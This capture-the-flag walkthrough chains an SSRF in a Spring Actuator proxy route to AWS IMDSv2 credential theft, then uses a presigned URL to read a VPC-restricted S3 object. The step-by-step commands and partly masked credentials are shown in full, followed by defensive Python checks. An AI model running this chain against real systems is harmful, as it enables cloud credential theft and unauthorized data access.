Wiz 2025 Challenge Walkthrough: From a Spring Actuator Leak to Reading Sensitive Files in S3
Background

After several weeks of exploitation and privilege escalation you have gained access to what you hope is the final server, and you can use it to extract the secret flag from an S3 bucket. But it won't be easy: the target uses an AWS data perimeter to restrict access to the bucket's contents. You've discovered a Spring Boot Actuator application running on AWS:

```
curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com
{"status":"UP"}
```

Solution

Spring Boot Actuator leak

Some analysis first. The flag must be in the bucket, and the challenge says the bucket has been locked down, so anonymous access probably won't work, but it is still worth a try. Anonymous access needs the bucket name, and since the challenge points us at Spring Boot Actuator, the obvious move is to read the env endpoint. Then try to list the bucket:

```
user@monthly-challenge:~$ aws s3 ls s3://challenge01-470f711/ --no-sign-request

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
```

Denied, so we have to find credentials. My first thought was the instance metadata service, but it does not respond:

```
curl http://169.254.169.254/latest/meta-data
```

This shell is apparently not running on an EC2 instance. So we hunt for credentials on disk, which tools like truffleHog can help with; a quick grep:

```
user@monthly-challenge:/$ grep -ri --exclude-dir={/proc,/sys,/dev,/run,/snap,/var/lib/docker} "Secret Access Key" /
```

The only hits were documentation strings inside the bundled AWS CLI's botocore service models (the service-2.json files), not real credentials.
Nothing came of that, and the usual credential hunting turned up nothing either, so following the hint we went back to the Spring side. We brute-forced the actuator endpoints for anything exploitable and pulled every route out of the mappings endpoint. Among them was a proxy route, which is presumably what gives access to the metadata service; metadata bypasses of this kind are usually SSRF vulnerabilities.

```
user@monthly-challenge:/$ curl "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/"
HTTP error: 401 Unauthorized
```

So the metadata service is reachable through the proxy, just not authorized: the instance uses IMDSv2. We first obtain a token with a PUT request:

```
user@monthly-challenge:/$ curl -X PUT \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/api/token"
AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q
```

That returns a token, which we then use to read the metadata:

```
user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q" \
  "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/"
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
system
```

It works. Now the credentials: first the role name, then the credentials themselves.

```
user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q" \
  "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
challenge01-5592368
```

```
user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q" \
  "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368"
{
  "Code": "Success",
  "LastUpdated": "2025-07-10T13:26:52Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIARK***WELX36",
  "SecretAccessKey": "PsrjWrAANNHBG3n***NmUHVglREBV",
  "Token": "IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIC6AH4pBiUXSj7Xih2aQvR3LmiwIQ8TeLO6Gv2iotAiEAi6CjgMDpky/IC6HpBwzG52L/EDfizjGUTaX/5YP4KcqwQUIv///////////ARAAGgwwOTIyOTc4NTEzNzQiDGpyJeQycy6B9rX9XiqVBYrNoqFyWFZz/IuhF6PqC8iDwPJ9uFspInzbcKaJ86Qx1issOwpJUdXyIUaYjLrJhdklRXKoSNxR/K/F2TOGOM/YPt/NBZkVtbz**********",
  "Expiration": "2025-07-10T19:47:29Z"
}
```

With these in hand we can configure a profile:

```
root@hcss-ecs-0d0e:~# aws configure set aws_access_key_id ASIARK7LBO**EXWELX36 --profile challenge01
root@hcss-ecs-0d0e:~# aws configure set aws_secret_access_key PsrjWrAANNHBG3ngmwQXdCdc******mUHVglREBV --profile challenge01
root@hcss-ecs-0d0e:~# aws configure set aws_session_token <session token, masked in the original> --profile challenge01
```

From now on we act with this role's permissions.

Locating the target file

First we check what bucket permissions this identity has, starting with who we are:

```
root@hcss-ecs-0d0e:~# aws sts get-caller-identity --profile challenge01
{
    "UserId": "AROARK7LBOHXDP2J2E3DV:i-0bfc4291dd0acd279",
    "Account": "092297851374",
    "Arn": "arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279"
}
```

Then we try to inspect the effective policy:

```
root@hcss-ecs-0d0e:~# aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 \
  --action-names s3:ListBucket s3:GetObject s3:PutObject s3:DeleteObject s3:ListAllMyBuckets \
  --profile challenge01

An error occurred (AccessDenied) when calling the SimulatePrincipalPolicy operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: iam:SimulatePrincipalPolicy on resource: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 because no identity-based policy allows the iam:SimulatePrincipalPolicy action
```

Unfortunately this role lacks that permission, so we simply list:

```
root@hcss-ecs-0d0e:~# aws s3 ls --profile challenge01

An error occurred (AccessDenied) when calling the ListBuckets operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: s3:ListAllMyBuckets because no identity-based policy allows the s3:ListAllMyBuckets action
```

No permission to list all buckets, but we already know the bucket name:

```
root@hcss-ecs-0d0e:~# aws s3 ls s3://challenge01-470f711/ --recursive --profile challenge01
2025-06-19 01:15:24         29 hello.txt
2025-06-17 06:01:49         51 private/flag.txt
```

Reading the file: bypassing the restriction

Trying to read it fails, unfortunately:

```
root@hcss-ecs-0d0e:~# aws s3 cp s3://challenge01-470f711/private/flag.txt - --profile challenge01
download failed: s3://challenge01-470f711/private/flag.txt to - An error occurred (403) when calling the HeadObject operation: Forbidden
```

No read permission, so we still have to look at the bucket policy:

```
root@hcss-ecs-0d0e:~# aws s3api get-bucket-policy --bucket challenge01-470f711 --profile challenge01
{
    "Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Deny\",\"Principal\":\"*\",\"Action\":\"s3:GetObject\",\"Resource\":\"arn:aws:s3:::challenge01-470f711/private/*\",\"Condition\":{\"StringNotEquals\":{\"aws:SourceVpce\":\"vpce-0dfd8b6aa1642a057\"}}}]}"
}
```

The policy only lets requests that arrive through the specified VPC endpoint (VPCe) read private/*; any other request is denied even if the identity has permission. What now? Clever GPT gave the answer, and it reminded me of the proxy:

```
root@hcss-ecs-0d0e:~# curl "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://s3.amazonaws.com/challenge01-470f711/private/flag.txt"
HTTP error: 403 Forbidden
```

Still blocked. Perhaps the proxy is not inside the VPC; we could verify that, but since the metadata reads just succeeded it most likely is. With no other option, I turned to a good friend for help. First we need to understand SigV4 signing: when accessing private resources in AWS, such as S3 objects, AWS requires the request to be signed. Reference: https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html

By default all Amazon S3 objects are private; only the object owner has permission to access them. The object owner can, however, share an object with others by creating a presigned URL. A presigned URL uses security credentials to grant time-limited permission to download the object. The URL can be entered in a browser or used by a program to download the object. The credentials used by the presigned URL are those of the AWS user who generated it.

So we need a presigned URL: https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/using-presigned-url.html

When creating a presigned URL you must supply your security credentials and then specify: an Amazon S3 bucket; an object key (when downloading, the object in your bucket; when uploading, the name of the file to upload); an HTTP method (GET to download an object, PUT to upload, HEAD to read object metadata, and so on); and an expiration interval.

Following that, we simply run the command to generate the signed URL:

```
root@hcss-ecs-0d0e:~# aws s3 presign s3://challenge01-470f711/private/flag.txt --profile challenge01 --expires-in 3600
https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?AWSAccessKeyId=ASIARK7LBOHXEXWELX36&Signature=WT7zPvNKLF6zr%2Fi4%2FGvqpJHoZzs%3D&x-amz-security-token=<session token, elided here>&Expires=1752171219
```

We then send this signed URL through the proxy, but the content kept getting truncated (presumably the & characters in the presigned query string ended the proxy's url parameter early), which was annoying, so I percent-encoded the entire URL and tried again:

```
root@hcss-ecs-0d0e:~# curl "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=<the presigned URL above, fully percent-encoded>"
```
```
The flag is: ********
```

Success.

Summary

All in all this was a challenge with real practical value, and the whole chain hangs together: get the bucket name -> no anonymous access -> collect configuration information -> metadata not reachable directly -> go through the proxy (the mappings endpoint leaked the proxy route) -> bypass the IMDSv2 protection -> get the identity -> check permissions -> list the file location -> VPC restriction -> think of the proxy again -> 403 -> consider a presigned URL. Smooth sailing.
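The root cause the writeup leans on is the actuator-exposed proxy route forwarding whatever url value it receives, including a fully percent-encoded one, to the instance metadata service. As an added example (not code from the challenge or the writeup), the Python check below shows how such a proxy should validate its target before fetching it: decode nested percent-encoding, require http(s), refuse link-local, private and loopback literals such as the IMDS addresses 169.254.169.254 and fd00:ec2::254, and allow only an explicit host allowlist; the allowlist host api.example.com is an assumption made for this example.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# Constructed allowlist for this example: the only upstream hosts the proxy may fetch.
ALLOWED_HOSTS = {"api.example.com"}

# AWS instance metadata endpoints (IPv4 and IPv6). Both already fall inside the
# link-local / unique-local ranges rejected below; listed explicitly for readability.
IMDS_ADDRESSES = {ipaddress.ip_address("169.254.169.254"), ipaddress.ip_address("fd00:ec2::254")}


def fully_decode(raw, max_rounds=3):
    """Undo (possibly nested) percent-encoding, as in the writeup's url=%68%74%74%70... request."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def check_proxy_target(raw_url, allowed_hosts=ALLOWED_HOSTS):
    """Return (ok, reason) for a proxy 'url' parameter value.

    Deny by default: only http(s) URLs whose host is on the allowlist pass, and
    IP-literal hosts in link-local, private, loopback or unspecified ranges are
    refused before the allowlist is even consulted.
    """
    url = fully_decode(raw_url)
    try:
        parts = urlsplit(url)
        host = parts.hostname  # lower-cased; brackets stripped for IPv6 literals
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in url is not allowed"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a DNS name rather than an IP literal
    if ip is not None:
        if ip in IMDS_ADDRESSES or ip.is_link_local or ip.is_private or ip.is_loopback or ip.is_unspecified:
            return False, f"address {ip} is in a blocked range"
    if host not in allowed_hosts:
        return False, f"host {host!r} is not on the allowlist"
    return True, "ok"
```

A production version must also resolve the hostname and apply the same address checks to every resolved IP, since a DNS name can point at a link-local or private address.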
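To make the data-perimeter logic of that bucket policy concrete, here is an added Python evaluator (not from the writeup, and not AWS's own evaluation engine) that applies the policy's Deny statement to a request context. It models only Principal "*" and the String* condition operators, and collapses the identity-based policy into the single boolean identity_allows.

```python
import json
import re

# The bucket policy the writeup retrieved with `aws s3api get-bucket-policy`.
BUCKET_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::challenge01-470f711/private/*",
    "Condition": {"StringNotEquals": {"aws:SourceVpce": "vpce-0dfd8b6aa1642a057"}}
  }]
}""")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _wild(pattern, value):
    """IAM-style wildcard match: '*' matches any run of characters, '?' exactly one."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value) is not None


def _condition_holds(condition, context):
    """Evaluate String* condition operators (the only kind this policy uses).

    A key that is absent from the request context makes a positive operator
    (StringEquals) fail but a negated one (StringNotEquals) succeed. That is why a
    request that did not arrive through any VPC endpoint still matches the Deny.
    """
    for operator, pairs in condition.items():
        if not operator.startswith("String"):
            raise NotImplementedError(operator)
        negated = "Not" in operator
        like = operator.endswith("Like")
        for key, expected in pairs.items():
            actual = context.get(key)
            if actual is None:
                if negated:
                    continue
                return False
            matched = any(_wild(e, actual) if like else e == actual for e in _as_list(expected))
            if matched == negated:
                return False
    return True


def evaluate(policy, action, resource, context, identity_allows):
    """Simplified S3 authorization: an explicit Deny in the bucket policy wins over
    any Allow; otherwise an Allow from the bucket policy or the identity policy
    (summarised as the boolean identity_allows) grants; otherwise implicit deny."""
    allowed = identity_allows
    for statement in policy["Statement"]:
        if statement.get("Principal") != "*":
            raise NotImplementedError("only Principal '*' is modelled")
        if not any(_wild(a, action) for a in _as_list(statement["Action"])):
            continue
        if not any(_wild(r, resource) for r in _as_list(statement["Resource"])):
            continue
        if not _condition_holds(statement.get("Condition", {}), context):
            continue
        if statement["Effect"] == "Deny":
            return "explicit-deny"
        allowed = True
    return "allow" if allowed else "implicit-deny"


FLAG = "arn:aws:s3:::challenge01-470f711/private/flag.txt"
HELLO = "arn:aws:s3:::challenge01-470f711/hello.txt"
VPCE = "vpce-0dfd8b6aa1642a057"
```

Calling evaluate with an empty context reproduces the 403 the role received from outside the endpoint, while the same role with aws:SourceVpce set to the allowed endpoint is permitted, which is exactly the difference the presigned-URL-through-the-proxy step exploits.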
